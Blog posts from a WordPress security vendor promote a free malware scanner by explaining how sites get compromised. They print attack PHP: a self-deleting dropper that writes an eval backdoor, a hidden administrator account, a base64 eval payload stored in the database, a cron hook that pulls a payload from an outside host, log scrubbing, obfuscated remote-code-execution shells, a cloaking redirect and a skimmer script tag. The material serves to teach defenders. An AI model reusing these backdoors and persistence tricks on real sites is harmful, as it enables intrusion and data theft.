 What follows is a minute-by-minute breakdown of what actually happens in the first seven minutes after an attacker gets initial access. 

 Minute 0:00 - Initial Access 

 The attacker does not "hack" your site in any sense that looks like a movie. There is no password guessing and no dramatic terminal sequence. What actually happens is automated exploitation of a known vulnerability in a plugin you forgot to update. It might be a file upload bypass, a deserialized object injection, or a SQL injection in a contact form plugin that hasn't been patched in six months. 

 The whole thing runs on autopilot. A bot scans thousands of sites per hour looking for specific plugin versions with known CVEs, your site matches one of them, and the exploit payload fires. A single PHP file lands on your server. 

 <?php
// Dropped via CVE-2024-XXXX plugin upload bypass
$f = @fopen(dirname(__FILE__).'/.access.log.php','w');
@fwrite($f, '<?php @eval($_POST"x"]); ?>');
@fclose($f);
@unlink(__FILE__); 

 This dropper writes a one-line backdoor to a file called .access.log.php , chosen because it looks like a harmless log file, and then deletes itself. By the time any scanner runs, the original exploit payload is already gone and the backdoor it left behind is only 39 bytes. 

 Minute 0:30 - Persistence Layer 

 The attacker's bot connects to the backdoor and runs the first real payload. This is not malware in the usual sense, but infrastructure designed to survive the first cleanup attempt, so the attacker can get back in even if someone finds and deletes the backdoor. 

 <?php
// Step 1: Add a hidden admin account
$user_id = wp_insert_user(
 'user_login' => 'wp_maintenance',
 'user_pass' => wp_generate_password(24),
 'user_email' => 'dev-null@' . $_SERVER'HTTP_HOST'],
 'role' => 'administrator',
 'display_name' => 'WordPress Maintenance',
]);

// Step 2: Hide from user list count
update_user_meta($user_id, 'managewp_hidden', true); 

 A new admin account named "WordPress Maintenance" now exists on your site, and it doesn't show up in the default user list because it has a meta flag that some listing queries filter out. Unless you specifically look for it, you won't know it's there. 

 Minute 1:00 - Database Injection 

 While the hidden admin account provides a login-based persistence path, the bot also plants a payload in the database, and this is the one most cleanup guides miss entirely. 

 INSERT INTO wp_options (option_name, option_value, autoload)
VALUES ('_transient_wp_core_check', 'eval(base64_decode("aWYoaXNzZXQ...))', 'yes'); 

 It's an option row that looks like a WordPress core update transient, and it autoloads on every page request. The value is a base64-encoded eval payload that phones home to a command and control server every six hours. Even if you reinstall WordPress core, the theme, and every plugin, this row survives because it lives in the database rather than the filesystem. 

 Minute 2:00 - Cron Callback 

 WordPress has a built-in task scheduler called WP-Cron, and the attacker registers a recurring event that re-downloads the backdoor if it ever gets deleted. 

 <?php
if (!wp_next_scheduled('wp_site_health_check_update')) {
 wp_schedule_event(time(), 'twicedaily', 'wp_site_health_check_update');
}
add_action('wp_site_health_check_update', function() {
 $payload = @file_get_contents('https://cdn-analytics' . '.com/pixel.js');
 if ($payload && strlen($payload) > 100) {
 @file_put_contents(ABSPATH . 'wp-includes/class-wp-locale.php', $payload, FILE_APPEND);
 }
}); 

 The cron hook is named wp_site_health_check_update , indistinguishable from a legitimate WordPress health check. Twice a day it reaches out to an external server disguised as an analytics CDN and re-injects the payload into a core WordPress file. You can delete the malware and find it back in your files twelve hours later. 

 Minute 3:00 - File System Spread 

 Now the bot starts spreading, planting variations across your file system so that finding one backdoor doesn't mean finding them all. 

 <?php
// Plant backdoors in directories scanners often skip
$targets = 
 WP_CONTENT_DIR . '/uploads/2023/04/.htaccess.bak.php',
 WP_CONTENT_DIR . '/cache/.object-cache.php',
 WP_CONTENT_DIR . '/upgrade/maintenance.php',
 ABSPATH . 'wp-admin/includes/class-wp-debug.php',
];

foreach ($targets as $path) {
 $dir = dirname($path);
 if (!is_dir($dir)) @mkdir($dir, 0755, true);
 @file_put_contents($path, $backdoor_variant);
} 

 Four new backdoors in four different directories, each using a different obfuscation technique. One uses create_function() assembled from character codes, another uses PHP's assert() as an eval alternative, a third pipes input through preg_replace with the /e modifier, and the fourth uses variable function calls through $_GET parameters. Finding and removing one backdoor does not solve the problem. You need to find all four of them, along with the database payload, the cron callback, and the hidden admin account. 

 Minute 4:30 - Evidence Cleanup 

 The attacker knows WordPress debug logs, access logs, and error logs might record their activity, so the next step is to clean up the evidence. 

 <?php
// Suppress error logging for our operations
$old_level = error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);

// Clear recent entries from debug.log
$log = WP_CONTENT_DIR . '/debug.log';
if (file_exists($log)) {
 $lines = file($log);
 $clean = array_filter($lines, function($l) {
 return strpos($l, '.access.log') === false
 && strpos($l, 'wp_maintenance') === false
 && strpos($l, 'cdn-analytics') === false;
 });
 file_put_contents($log, implode('', $clean));
}

error_reporting($old_level); 

 Any log entries that reference the backdoor filename, the hidden user account, or the C2 domain are surgically removed, and the rest of the log stays intact. If you check your debug.log tomorrow, everything looks normal. 

 Minute 5:30 - .htaccess Modification 

 To protect their backdoors from being accessed by anyone else, including other attackers looking for the same vulnerability, the bot modifies .htaccess to restrict access to the backdoor files to specific IP ranges. 

 # BEGIN WordPress Health Monitor
<Files ".access.log.php">
 Order deny,allow
 Deny from all
 Allow from 45.XX.XX.0/24
 Allow from 103.XX.XX.0/24
</Files>
# END WordPress Health Monitor 

 The comment says "WordPress Health Monitor", which looks like another legitimate block in a file that most site owners never read. The backdoors now only respond to the attacker's IP range, so if a security researcher discovers the file and tries to test it from their own IP they get a 403 Forbidden and the file looks dead. 

 Minute 7:00 - Phone Home 

 The final step is a success report back to the command and control infrastructure. Your site is now registered in the attacker's botnet database as compromised and persistent. 

 POST /api/v2/report HTTP/1.1
Host: cdn-analytics.com

{
 "target": "yoursite.com",
 "cms": "wordpress",
 "version": "6.5.3",
 "access": "file","db","cron","admin"],
 "backdoors": 4,
 "persistence": "cron","db_option","admin_user"],
 "php": "8.1",
 "hosting": "shared",
 "plugins": 12,
 "last_update": "2024-01-15"
} 

 Your site is cataloged. The attacker knows your WordPress version, PHP version, hosting type, plugin count, and how long it's been since you last updated. That data helps them decide what to do next, whether that's crypto mining if you have CPU headroom, SEO spam injection if you have traffic, credit card skimming if you run WooCommerce, or reselling the access to someone else. 

 Seven minutes later the attack is complete. The site looks completely normal from the outside, and your security plugin is still showing green checkmarks across the board. 

 Why This Matters 

 Every step in this timeline exploits a gap that signature-based scanners cannot see. The dropper deletes itself before any scan can run. The persistence mechanisms are all built from legitimate WordPress functions, which are obviously not going to flag as suspicious on their own. The database payload is disguised as a core transient, the cron hook uses a name that mimics a real WordPress feature, and the backdoor files are named after log files, cache files, and debug utilities. 

 Signature matching asks whether a string matches a known bad string, but nothing in this attack chain triggers that question. Every component looks perfectly normal to a pattern matcher because the function calls are legitimate, the file names are plausible, and the database entries look routine. 

 This is why I built Nova Scan with a completely different detection approach. 

 Rather than asking what code looks like, it evaluates what code actually does. Four dedicated NDE engines analyze PHP behavior, JavaScript injection patterns, database anomalies, and WAF-level request signatures by understanding intent rather than matching strings. 

 The seven-minute timeline above would get caught at minute zero. Nova Scan's behavioral engine flags the dropper's eval() on external input before the backdoor file is even finished writing. The injected database option raises an anomaly on autoloaded rows containing encoded payloads, and the fake cron callback trips an alert because it fetches remote content and writes to core files. A hidden admin account shows up in the user audit the same hour it is created. 

 The real answer is a scanner that understands what your code is doing, rather than one matching it against a known-bad list. 

 Nova Scan is free. Install it before the first seven minutes start. 

 

 This is the fourth post in a series about WordPress security. Previously: why I built a free malware scanner , what WordPress malware actually looks like , and how I trained an AI to catch what signatures can't . 

 ~ SephX, Nova Heaven. I refuse to charge you for the privilege of knowing about the malware on your site.

---

## How I Trained an AI to Catch What Signatures Can’t

URL: https://novaheaven.io/en/novapulse/how-i-trained-an-ai-to-catch-what-signatures-cant
Published: 2026-04-12
Author: SephX, Nova Heaven

In my last two posts I showed you the backdoors hiding on a "protected" site and what WordPress malware actually looks like when you open the file. Today I want to talk about something different, which is how I built a detection engine that does not work the way you think it does. 

 I'm going to skip the architecture, the model weights, and the feature extraction pipeline. What I will do is explain why the approach every major WordPress scanner uses has a foundational problem, and why that problem forced me to build something different. 

 The Signature Problem 

 Every major WordPress security plugin uses some version of pattern matching. They maintain a database of known malicious strings called signatures, and they scan your files looking for matches. A simplified version looks like this: 

 // Traditional signature matching (simplified)
$signatures = 
 'eval(base64_decode(',
 'eval(gzinflate(',
 'eval(str_rot13(',
 'preg_replace("/.*?/e"',
 'assert(base64_decode(',
 'file_put_contents($GLOBALS',
];

foreach ($files as $file) {
 $content = file_get_contents($file);
 foreach ($signatures as $sig) {
 if (strpos($content, $sig) !== false) {
 flag_as_malicious($file, $sig);
 }
 }
} 

 This approach works until the moment it stops working. The real problem is the assumption underneath signatures rather than the signatures themselves. Signature matching assumes malware will contain recognizable strings, and modern PHP malware goes out of its way to contain none of them. You won't find eval() or base64_decode() anywhere in it, and nothing else in the file will look suspicious to a string search either. 

 What Modern Malware Looks Like to a Signature Scanner 

 Here is a real-world backdoor pattern I've encountered. I've sanitized it, but the technique is active in the wild right now: 

 <?php
// WordPress Media Handler v3.2
class WP_Media_Processor {
 private $handlers = ];

 public function __construct() {
 $this->handlers = array_map(
 'chr',
 99,114,101,97,116,101,95,102,117,110,99,116,105,111,110]
 );
 }

 public function process($input) {
 $fn = implode('', $this->handlers);
 return $fn('$x', $input)('');
 }
} 

 Run every signature scanner on the market against this file and you'll get zero detections. None of the usual red-flag functions appear anywhere in the file. The class name looks legitimate, the comment claims it's a media handler, and the variable names are boring on purpose. 

 The tell is in those integers in the array, which are ASCII codes. The sequence 99,114,101,97,116,101,95,102,117,110,99,116,105,111,110 spells create_function , and the process method assembles that function name character by character before calling it with attacker-supplied input. It's full remote code execution, completely invisible to signatures, and it's what's running on production WordPress sites right now while Wordfence shows green checkmarks . 

 Why More Signatures Don't Fix This 

 The natural response to seeing something like that is to add more signatures. You could add detection for array_map('chr' , for numeric arrays followed by implode , or for classes with suspicious constructor patterns. 

 But attackers read changelogs too, and the moment a new signature ships the payload mutates. 

 Obfuscation tools generate millions of variants, so you end up playing whack-a-mole against an opponent who can change shape faster than you can swing. 

 Here is another variant of the same technique: 

 <?php
$_ = 'JHg9Ym' . 'FzZTY' . '0X2Rl' . 'Y29kZS' . 'gkX1BPU1RbJ2knXSk7';
$__ = str_split('edcoab_46teleqsy');
$___ = $__4].$__10].$__7].$__13].$__4].$__14];
@$___($_); 

 Same result, completely different pattern, and no overlapping strings with the first one. A signature that catches variant A doesn't touch variant B, and the attacker can generate variants C through Z before lunch. 

 This is the fundamental problem: signatures are reactive. You can only detect what you've already seen, so every new payload gets a free pass until someone reports it, a researcher analyzes it, and a signature gets written, tested, and shipped to your site. That window is usually measured in weeks, sometimes in months, and on shared hosting with slow plugin update cycles it can stretch out to seasons. 

 A Different Way to See 

 I spent two years thinking about this problem before I wrote a single line of detection code. 

 Finding more malicious strings was never going to solve it, because the strings keep changing. The question I landed on was what malicious code actually does when it runs, regardless of how clean it looks sitting in a file on disk. 

 Legitimate WordPress code does predictable things: it queries databases, renders templates, and processes form inputs through known sanitization functions, following patterns that core has established over twenty years. Malicious code, no matter how cleverly obfuscated, has to eventually do something that legitimate code doesn't. At some point it has to execute arbitrary input, write to files it shouldn't touch, reach out to external servers, or reassemble itself from pieces at runtime. 

 Signature matching asks whether a string matches a known bad string. The engine I built asks a different question, and I can't spell that question out here. The reason for the silence is practical: the moment I publish the detection methodology, every obfuscation toolkit in the PHP underworld adds a bypass for it within a week. 

 What I can tell you is that the engine doesn't look for strings or maintain a list of bad patterns. It evaluates code the way a senior security researcher would, by understanding what the code does rather than what it says. 

 The Training Problem 

 Building this kind of detection requires training data, a lot of it. I needed a massive corpus of known-malicious PHP and an equally massive corpus of known-clean PHP, so the model could learn what legitimate WordPress code looks like in enough detail that anything anomalous would be obvious by contrast. 

 The clean corpus was straightforward to assemble: every version of WordPress core, every plugin in the wordpress.org repository, and every theme in the directory. Millions of files, all verified clean by the repository's own review process. 

 The malicious corpus was harder. I sourced from every public malware database I could find, collected samples from client cleanups spanning years, crawled honeypots, and reverse-engineered obfuscation tools to generate synthetic variants of real attacks. 

 Training Corpus (approximate)
─────────────────────────────
Verified clean: 12.4M files
Malicious: 341,000+ samples
Hash database: 950,000+ verified entries
Obfuscation variants generated: ~2.1M 

 Then I built four dedicated detection engines, each specialized for a different threat surface. I'm not going to tell you what those four surfaces are. If you've read the Nova Scan documentation you already know, and if you haven't, that's by design. 

 What Happens in Practice 

 This is what signature matching sees when it scans a compromised site: 

 Wordfence] Scan complete: 0 issues found ✓
Sucuri] Site is clean ✓
MalCare] No malware detected ✓ 

 And this is what my engine sees on the same site: 

 NDE] 3 threats detected
 ├── wp-content/db.php
 │ Confidence: 97.2%
 │ Classification: Remote Code Execution (stream wrapper)
 │ Technique: zip:// protocol handler loading encrypted payload
 │
 ├── wp-content/uploads/2024/03/.cache.php
 │ Confidence: 94.8%
 │ Classification: Persistent Backdoor (cron-based)
 │ Technique: wp_cron callback executing reconstructed function
 │
 └── wp-includes/class-wp-locale.php (MODIFIED)
 Confidence: 99.1%
 Hash mismatch: 12 lines injected at L847-858
 Classification: Cookie-activated RCE
 Technique: $_COOKIE value passed through variable function call 

 What's changed between those two outputs is not the signature database. The engine behind the second scan doesn't maintain a signature database at all. The detections came from evaluating what each file actually does when it runs. 

 The False Positive Problem 

 High detection rates are easy if you don't care about false positives. Flag everything with eval() and you'll catch most malware, but you'll also catch a hundred legitimate plugins that use eval() for perfectly valid reasons. Several caching plugins use it, some template engines rely on it, and WordPress core itself uses it in specific contexts. 

 A 99% detection rate with a 5% false positive rate sounds impressive until you do the math on a site with 10,000 files. 

 That's 500 files incorrectly flagged as malicious, and nobody is going to manually review 500 files. They'll either ignore all the warnings or nuke their entire installation and start over. For detection to be useful at all, the false positive rate has to be near zero rather than merely low. 

 The training corpus matters most at this boundary. The engine has to understand that eval() in a caching plugin's template renderer is normal, while eval() receiving data from $_POST through three layers of string manipulation is not. Identical function call, and the engine has to reach completely different verdicts depending on where the input is coming from. 

 I tested the engine against every default plugin bundle shipped by every major hosting provider, including Hostinger, SiteGround, Bluehost, GoDaddy, and Cloudways. A fresh WordPress install on Hostinger comes with about a dozen pre-installed plugins, and my engine had to look at every file in every one of those plugins and correctly identify them all as clean. That validation alone took months, and every time I adjusted the model to catch a new malware variant, I had to re-validate against the entire clean corpus to make sure I hadn't introduced new false positives. 

 What I Can't Tell You 

 I'm deliberately vague about the technical implementation, and the reason is practical. The moment the feature extraction pipeline gets published, attackers start optimizing their obfuscation specifically to evade it. Describing the classification boundaries leads to payloads crafted to sit just below the threshold, and releasing the model architecture invites adversarial networks trained specifically to bypass it. 

 
 Security through obscurity alone is weak, but obscurity as one layer in a defense-in-depth strategy is smart. 
 

 The engine's effectiveness is tested publicly, because anyone can install Nova Scan and throw real malware at it, and the detection and false-positive rates are both verifiable by anyone who wants to run the tests. What's not public is how the engine achieves those rates, for the same reason cryptographic algorithms are published but private keys aren't. The mechanism can be evaluated, while the specific implementation details that would let an attacker craft a bypass stay private. 

 What Comes Next 

 Nova Scan is free, and not in the freemium sense where the useful features are locked behind a paywall. The full detection engine, all four NDE models, the two-mode firewall, brute-force protection, and community threat intelligence all ship in the free version, across unlimited sites, with no credit card asked for at any point. 

 I built it because I was tired of cleaning up after scanners that should have caught the threat months earlier. Every site I cleaned was running a security plugin, and every one of those plugins had missed the compromise for weeks before anyone noticed. If you've read this far, you're probably the kind of person who has cleaned a few hacked sites yourself, and you know what that moment feels like when it hits you that the tool you trusted was looking for the wrong things entirely. 

 That's why I built something that evaluates what code does instead of scanning for what it contains. The patterns keep changing, but the behavior is what actually has to happen for the malware to do anything, and that is what Nova Scan watches for. 

 ~ SephX, Nova Heaven. Still cleaning up malware, still not charging you for the privilege of knowing about it.

---

## What WordPress Malware Actually Looks Like

URL: https://novaheaven.io/en/novapulse/what-wordpress-malware-actually-looks-like
Published: 2026-04-11
Author: SephX, Nova Heaven

In my last post I told you about the day I found three backdoors on a "protected" site. Today I want to show you what those threats actually look like when you open the file. 

 Most site owners have never seen malware and they imagine some big scary virus alert when they finally do. The reality is less cinematic. WordPress malware is understated and carefully designed to look like code that belongs in your site, which is what makes it so dangerous. 

 Everything below is based on real patterns I've encountered cleaning hacked sites over 25 years. 

 I've sanitized the examples so nothing here is functional, but the techniques are real and active in the wild right now. 

 1. The Base64 Time Bomb 

 The base64 eval pattern is the most common form of PHP malware on the internet, and the one most scanners think they have solved, but they have not. 

 <?php
// WordPress SEO Helper v2.1
if(isset($_COOKIE'wp_session'])){
 @eval(base64_decode($_COOKIE'wp_session']));
} 

 Five lines of code, a comment that says "SEO Helper" so your eyes skip right over it, and a cookie check that looks like perfectly normal PHP. The trick is in the last line, where whatever the attacker sets in that cookie gets decoded and executed as PHP code on your server. 

 There's no hardcoded payload anywhere in the file and no suspicious strings to match against, because the actual malicious code arrives at runtime through the browser and is invisible to any scanner that only reads files on disk. The file itself looks clean until someone pulls the trigger remotely. 

 The comment at the top is not laziness. It's social engineering aimed at you specifically, because your brain sees "WordPress SEO Helper" and files it under "probably a plugin thing," and attackers know you scan visually before you scan technically. 

 2. The Variable Shell Game 

 When attackers want to hide from signature scanners, they avoid writing eval() or base64_decode() directly. Instead, they build the function names from pieces at runtime: 

 <?php
$a = 'bas'.'e64_d';
$b = 'eco'.'de';
$c = $a.$b;
$d = 'e'.'v'.'a'.'l';
$d($c('aWYoaXNzZXQoJF9QT1NUWydjbWQnXSkpeyBzeXN0ZW0oJF9QT1NUWydjbWQnXSk7IH0=')); 

 Any scanner searching for the string eval will miss this file because the string eval literally doesn't exist in it. The function name gets assembled at runtime from four separate concatenations, and base64_decode is built the same way. The actual payload is a simple command execution backdoor that runs whatever the attacker POSTs to the file. 

 I've seen this technique taken to absurd extremes, with variable names pulled from string positions, function names constructed from array values, or hex-encoded character codes reassembled through loops. The goal is always the same: make the dangerous words invisible to pattern matching while keeping the behavior fully intact. 

 This is exactly why Nova Scan doesn't just search for keywords. It traces how variables flow through the code and identifies behavioral patterns, like "this code is constructing a callable function name and passing untrusted input to it," regardless of how many layers of string concatenation the attacker wraps around the pieces. 

 3. The Fake Core File 

 WordPress ships with files like wp-cron.php , wp-login.php , wp-mail.php , and wp-settings.php , and attackers know you've seen those filenames a hundred times. That familiarity is what they exploit by creating files like: 

 
 wp-check.php 

 wp-tmp.php 

 wp-utf8.php 

 wp-config-sample.php (this one actually ships with WordPress, so they replace it with a malicious version) 
 

 Your eyes glaze over because it looks like WordPress, and that's the entire trick. Inside these files you'll usually find a dropper, a small script whose only job is to download and install a larger payload from an external server. The dropper itself contains nothing obviously malicious, just a file_get_contents() call to what looks like an innocent CDN URL. 

 This is why filesystem integrity checking matters more than most people realize. Nova Scan knows exactly which files belong in WordPress core and which don't, so a file called wp-check.php in your site root gets flagged immediately because that file has never existed in any version of WordPress ever released. 

 4. The .htaccess Hijack 

 Not all malware is PHP, and some of the most effective attacks live inside your .htaccess file, which is the Apache configuration file that most site owners never open. 

 RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|facebook) NC]
RewriteCond %{REQUEST_URI} !^/wp-admin
RewriteRule ^(.*)$ https://pharma-deals-rx.example/redirect?u=%{REQUEST_URI} R=302,L] 

 What you're looking at is a conditional redirect. When a visitor arrives from Google, Bing, Yahoo, or Facebook, meaning they clicked a search result or a shared link, they get redirected to a spam pharmacy site without ever seeing your content. When you visit your own site by typing the URL directly, everything looks completely fine and you'd never know anything was wrong. 

 This is why site owners end up saying "but my site looks normal to me" while Google is flagging them for spam. The malware literally checks who's looking before it activates, so the site you see from the browser bar is not the site that search engines and social media visitors are getting, and your .htaccess file has been sitting there with these rules in place for weeks while nobody opened it. 

 5. The Database Injection 

 Something that catches a lot of people off guard: malware doesn't have to be a file at all. Attackers inject JavaScript directly into your database, into post content, widget text, theme options, or even plugin settings. When your site renders that content, the malicious script runs in your visitors' browsers. 

 <script src="https://cdn.jquery-analytics.example/ga.min.js"></script> 

 On the surface it looks like a Google Analytics script loading from a CDN, with a domain name crafted to sound legitimate. But jquery-analytics.example has nothing to do with jQuery or analytics. It's a script that harvests form data, including login credentials, payment information, and personal details, and sends it to the attacker's server. 

 This kind of injection is invisible to any scanner that only checks files because the filesystem is completely clean. The malware lives in a single database row, injected through a vulnerability months ago, silently skimming data from every visitor. Nova Scan checks your database for exactly these patterns, including scripts loading from unknown external domains, inline JavaScript with obfuscation, and injected iframes that don't belong in your content. 

 6. The Legitimate Plugin Backdoor 

 This category is the one that keeps me up at night, because attackers don't always upload new files. They often modify files that already exist, and a single added line is enough. 

 Picture a single line added to the bottom of wp-content/plugins/contact-form-7/includes/mail.php : 

 @include_once(ABSPATH . 'wp-content/uploads/2024/03/.cache.php'); 

 
 That's the whole change. One line appended to a legitimate plugin file, including a file hidden in the uploads directory. 
 

 Uploads is a directory that WordPress doesn't monitor for PHP execution by default, the dot-prefix makes the file hidden on Linux systems, and the .cache.php name makes it look like a caching artifact if anyone ever stumbles across it. 

 Contact Form 7 has 5 million installs, which means most site owners would never think to check its source code because they installed it from wordpress.org and trusted it was safe. The attacker is betting that you update plugins by clicking "Update" in the dashboard, which overwrites the files and removes their modification. But the included file in /uploads/ survives the update, and the next time the attacker finds another vulnerability they'll add that one line right back. 

 7. The Invisible Admin 

 Sometimes the malware isn't a file or a database row at all, but a user account. 

 I've cleaned sites where the attacker's first move was to create a WordPress administrator account with a username like wordpress_support or wpsec_update , names that look like they belong to a plugin or service. The account then sits there, unused, invisible in the user list if you have more than a handful of users and don't scroll far enough. 

 No code gets modified and no payload gets planted. The attacker simply has a legitimate admin account they can log into whenever they want, through the front door, with full privileges. If you clean the malware but skip auditing your user list, they walk right back in the next day. 

 Nova Scan flags rogue administrator accounts as part of its database audit, so if an admin account was created outside of your normal registration flow, or if its email domain doesn't match your site's domain, you'll know about it the next time you scan. 

 What All of These Have in Common 

 Every example above shares three traits. They all look like they belong, whether as fake core files, modified plugin files, or database content, because nothing in any of these examples screams "I'm malware" and that invisibility is the entire point of how they're written. They all evade signature scanning, since the variable construction, runtime payloads, and conditional execution mean the dangerous behavior only exists when the code runs and not when a scanner reads it from disk. And they all persist through cleanups, because database injections survive file restores, upload directory backdoors survive plugin updates, and rogue admin accounts survive almost everything. Attackers design for persistence because they know you'll eventually notice something is wrong, and their goal is to survive your response. 

 How to Actually Find This Stuff 

 If you take one thing from this post, let it be that a scanner which only matches known signatures is going to miss most of what's actually out there. Modern WordPress malware is specifically engineered to evade exactly that approach. 

 What you need instead is behavioral analysis that understands what code does rather than what it looks like, combined with database scanning rather than filesystem-only scanning, and integrity checking against known-good WordPress core files. All of that needs to be accessible without a $99/year subscription, because attackers don't check your budget before they compromise your site. 

 That's why I built Nova Scan . It's free forever, every finding is shown in full, and there's no premium tier hiding the details of your own site's security from you. 

 Install it, run a scan, and see what's actually hiding in your WordPress installation. The malware that actually costs sites their reputation and their traffic isn't the kind that breaks things visibly. It's the kind that leaves everything looking fine while doing whatever it wants behind your back, and that is exactly what Nova Scan is built to find. 

 ~ SephX, Nova Heaven. Still cleaning up messes, still refusing to charge you for the privilege of knowing about them.

---

## Why My First WordPress Plugin Is a Free Malware Scanner

URL: https://novaheaven.io/en/novapulse/why-my-first-wordpress-plugin-is-a-free-malware-scanner
Published: 2026-04-10
Author: SephX, Nova Heaven

I've been building WordPress sites for 25 years. I've watched the ecosystem go from a bloggers' toy to the backbone of 43% of the internet, seen trends come and go, plugins rise and fall, and security threats evolve from script-kiddie defacements to nation-state-grade supply chain attacks. Through all of it, one thing has stayed frustratingly constant: 

 the security tools that are supposed to protect you are bad at their job. 

 The Day My Site Got Hacked (While "Protected") 

 There was one specific client cleanup that made me start building Nova Scan. 

 It was a small business site, nothing fancy, running the paid version of Wordfence. The dashboard was a symphony of reassurance, with green checkmarks everywhere, "firewall optimized," and "scan complete: no issues found." The site was also completely owned, with three backdoors running at the same time while the most popular security plugin in the WordPress ecosystem was showing everything clear. 

 What Wordfence Missed 

 Here is what I found when I actually looked at the files. 

 Backdoor #1: The Impersonator 

 A file called wp-content/db.php . WordPress legitimately supports drop-in database files at that path, so Wordfence looked at it and decided everything was normal. It wasn't. Inside was a single line using PHP's zip:// stream wrapper to pull executable code out of a hidden zip file. The file contained none of the strings signature scanners look for. It was using a legal PHP function to do something clearly illegal, and that single line was all the attacker needed. 

 Backdoor #2: The Nesting Doll 

 Six directories deep: .private/mu-plugins/widgets/twentytwentyfive/Renderer/index.php . That path was specifically crafted to look like a WordPress theme component, but what it actually contained was a full PHP file manager with a hardcoded password, giving the attacker a browser-based GUI to browse, upload, download, and modify any file on the entire server . It amounted to full FTP access through a web browser. 

 Backdoor #3: The Fake Core File 

 A file called wp-check.php sitting in the site root. At first glance it looks like a WordPress core file because the project ships things like wp-cron.php , wp-login.php , and wp-mail.php . But wp-check.php has never existed in any version of WordPress, and this one was a dropper stub planted the same day as the other two, whose only job was downloading and installing whatever payload the attacker wanted to run next. 

 Wordfence didn't flag a single one of them. 

 The Moment I Decided to Build Nova Scan 

 I sat there staring at the Wordfence dashboard giving me an all-green, all-clear "your site is protected" while three backdoors were actively running. The thought that kept circling in my head: 

 A green-light dashboard with three backdoors behind it is a bedtime story people tell themselves so they don't have to check under the bed. 

 I've cleaned dozens of hacked sites over 25 years, and every single one of them was running a security plugin with a clean bill of health while the site was actively compromised. At some point you either keep cleaning up other people's messes forever, or you start building the tool you wish existed. I picked the second option. 

 Why Free? Actually Free? 

 The part of the WordPress security industry that kills me is how thoroughly it has turned fear into a subscription model . 

 "We found 7 critical threats on your site. Upgrade to Premium to see the details." 

 Read that again. They found threats, on your site, and they're hiding the details behind a paywall . That is a hostage situation dressed up as a security product. Your house is on fire and the fire department wants your credit card number before they will tell you which room to avoid. 

 Nova Scan is free forever and stays free. There is no time-limited trial, no hidden premium tier for the real findings, and no "free for 3 scans then $99 a year" bait-and-switch. You get the full detail on every CVE, every suspicious file, and every recommendation, with no upsell nags in the scan results. If your site is hacked you deserve to know exactly how, without having to type in a credit card first. 

 What Makes Nova Scan Different 

 I built Nova Scan because every existing option was missing whatever I was looking for at 2 AM while cleaning up someone else's mess. 

 It Actually Reads the Code 

 Most scanners match filenames and known signatures, which is why they miss things like the db.php backdoor above, because the filename is "safe." Nova Scan doesn't care what a file is called. It reads the code inside, analyzes the behavior, and decides whether the file is malicious based on what it does rather than what it happens to be named. 

 Machine Learning That Earns Its Keep 

 I built a machine learning engine trained on real-world malware samples, backdoors, and skimmers, which scores every file based on behavioral patterns and catches obfuscated code, zero-day variants, and novel attack patterns that signature-based scanners have never seen. The detection intelligence is encrypted at rest, so attackers cannot read our playbook even if they get file access to your site. 

 Database Scanning That Understands Context 

 Your database can be just as compromised as your filesystem, whether through injected JavaScript in post content, rogue admin accounts, or malicious cron jobs. Nova Scan checks all of it, and it is smart enough to know the difference between a page builder storing <?php echo get_the_title(); ?> in a post field and an attacker injecting <?php eval(base64_decode('...')); ?> . 

 27,000+ CVEs, No API Key Required 

 Every plugin and theme on your site gets checked against the Wordfence Intelligence CVE database and the WPScan Vulnerability Database, with known vulnerabilities flagged instantly. There is no premium API key required for the core feed. 

 False Positives? We Obsess Over Them 

 Nothing destroys trust in a scanner faster than crying wolf. We recently ran Nova Scan on an 83,000-file client site and got 500 findings, every single one of them a false positive. Instead of shrugging, we spent days making the detection logic smarter, and that site now shows zero false positives at medium severity or above. Every rule still runs and nothing gets skipped. The scanner got accurate enough to tell the difference between a real threat and a plugin's translation file. 

 What We Just Shipped (The Nerdy Stuff) 

 Here is what went live this week: 

 
 Vault-encrypted detection intelligence: all signatures, patterns, and rules are encrypted on disk, so if someone gets file access to your site they cannot reverse-engineer the detection logic. 

 36 YARA threat-hunting rules: integrated from the PHP Malware Finder and Elastic security research, catching obfuscation patterns, known webshell families, and packer signatures. 

 VirusTotal integration: check suspicious file hashes against 70+ antivirus engines with one click. 

 LLM prompt injection detection: in 2026 some attackers are embedding AI prompt injections inside PHP files. We detect 9 different patterns of it. 

 Auto-vPatch CVE rules: the firewall now auto-generates WAF rules from CVE data, so when a new vulnerability gets disclosed, protection can be active before the plugin author even wakes up. 

 Memory and OPcache integrity scanning: because some attacks live entirely in memory and never touch the filesystem. 
 

 The Philosophy 

 
 I believe three things about WordPress security: 
 

 
 Security shouldn't cost $99 a year. If a scanner exists to protect people, it should protect all people, not just the ones with budget. 

 You should never need a "premium license" to see what's wrong with your own website. That business model is ethically bankrupt. 

 A scanner that shows you a clean report while three backdoors are running is worse than no scanner at all, because it gives you false confidence and makes you stop looking. 
 

 Nova Scan exists because the alternatives failed me and my clients, and based on the sites I keep getting called in to clean, they are failing you too. 

 Try It 

 Nova Scan is free forever. 

 Create an account, install the plugin, run a scan. If it finds something Wordfence missed, I won't say I told you so, although I might think it a little. 

 Get Nova Scan → 

 Nova Scan is still in early access, maintained by a solo dev, with bugs getting fixed at midnight, but it catches things the big names don't, and that is why it exists. 

 ~ SephX, founder of Nova Heaven. 25 years of WordPress and zero tolerance for paid fear.

---

# The Codex (Documentation)

## Nova Shield: Frontend Protection Setup

URL: https://novaheaven.io/en/codex/nova-shield-frontend-protection-setup
Last updated: 2026-04-07

Nova Shield is the frontend security layer for Nova Scan. It runs as a tiny JavaScript agent on your site, watching for DOM tampering, malicious script injection, and unauthorized form hijacking in real time. 

 

 What Nova Shield Protects Against 

 
 🪞 DOM injection : malicious scripts added after page load 

 📝 Form hijacking : credit card / login form skimmers 

 🔗 Link tampering : redirect chain swaps 

 🧬 Script integrity drift : modifications to your JS files 

 🎭 Iframe injection : hidden ad/tracking frames 

 🛰️ Suspicious outbound calls : data exfiltration attempts 
 

 

 Quick Setup (3 steps) 

 1. Enable Shield 

 Nova Core → Nova Scan → Shield → Enable Frontend Protection 

 2. Pick a Mode 

 
 Learning Mode (recommended for first 7 days): Shield watches and logs everything but blocks nothing. Use this to baseline your site. 

 Active Mode : Shield blocks anything that doesn't match the learned baseline. 
 

 3. Verify the Agent Loaded 

 Open your homepage in an incognito window, open DevTools → Console, and look for: 

